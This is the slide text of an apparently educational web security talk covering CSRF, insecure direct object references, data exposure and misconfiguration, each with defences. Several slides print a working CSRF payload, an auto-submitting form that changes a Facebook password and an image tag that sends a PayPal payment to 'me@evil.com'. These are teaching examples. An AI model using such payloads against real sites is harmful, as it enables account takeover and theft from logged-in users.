  • 73. CSRF Cross-Site Request Forgery Execute unwanted actions on another site which user is logged in to. • Change password • Transfer funds • Anything the user can do
  • 74. CSRF – Cross-Site Request Forgery Hi Facebook! I am colinodell and my password is *****. Welcome Colin! Here’s your news feed. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
  • 75. CSRF – Cross-Site Request Forgery Hi other website! Show me your homepage. Sure, here you go! Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  • 76. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  • 77. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Tell Facebook we want to change our password to hacked123 Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
  • 78. CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Hi Facebook! Please change my password to hacked123. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. Done!
  • 79. CSRF – Cross-Site Request Forgery short.ly <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten
  • 80. CSRF – Cross-Site Request Forgery short.ly Please wait while we redirect you to X
  • 81. Protecting Against CSRF Attacks Use randomized CSRF tokens <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf"> 1. Generate a random string per user. 2. Store it in their session. 3. Add to form as hidden field. 4. Compare submitted value to session 1. Same token? Proceed. 2. Different/missing? Reject the request.
  • 82. Insecure Direct Object References Access & manipulate objects you shouldn’t have access to
  • 84. Insecure Direct Object References Beverly Coop
  • 89. Protecting Against Insecure Direct Object References Check permission on data input • URL / route parameters • Form field inputs • Basically anything that’s an ID • If they don’t have permission, show a 403 (or 404) page
  • 90. Protecting Against Insecure Direct Object References Check permission on data input Check permission on data output • Do they have permission to access this object? • Do they have permission to even know this exists? • This is not “security through obscurity”
  • 93. Sensitive Data Exposure - CHANGELOG
  • 94. Sensitive Data Exposure – composer.lock
  • 95. Sensitive Data Exposure – composer.lock
  • 97. Sensitive Data Exposure – robots.txt
  • 98. Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption) • Customer information • Credit card numbers • Credentials Sensitive Data Exposure
  • 99. Security Misconfiguration & Components with Known Vulnerabilities Default accounts enabled; weak passwords • admin / admin Security configuration • Does SSH grant root access? • Are weak encryption keys used? Out-of-date software • Old versions with known issues • Are the versions exposed? • Unused software running (DROWN attack)
  • 100. Components with Known Vulnerabilities
  • 101. Components with Known Vulnerabilities
  • 102. Components with Known Vulnerabilities
  • 103. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date • Install critical updates immediately • Install other updates regularly
  • 104. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root • Files which provide version numbers • README, CHANGELOG, .git, composer.lock • Database credentials & API keys • Encryption keys
  • 105. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption • Encrypt with a strong private key • Encrypt backups and data-in-transit • Use strong hashing techniques for passwords
  • 106. Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption Test your systems • Scan your systems with automated tools • Test critical components yourself • Automated tests • Manual tests
  • 107. Next Steps Test your own applications for vulnerabilities Learn more about security & ethical hacking Enter security competitions (like CtF) Stay informed
  • 109. Thanks! Slides & feedback: https://joind.in/17622 Colin O'Dell @colinodell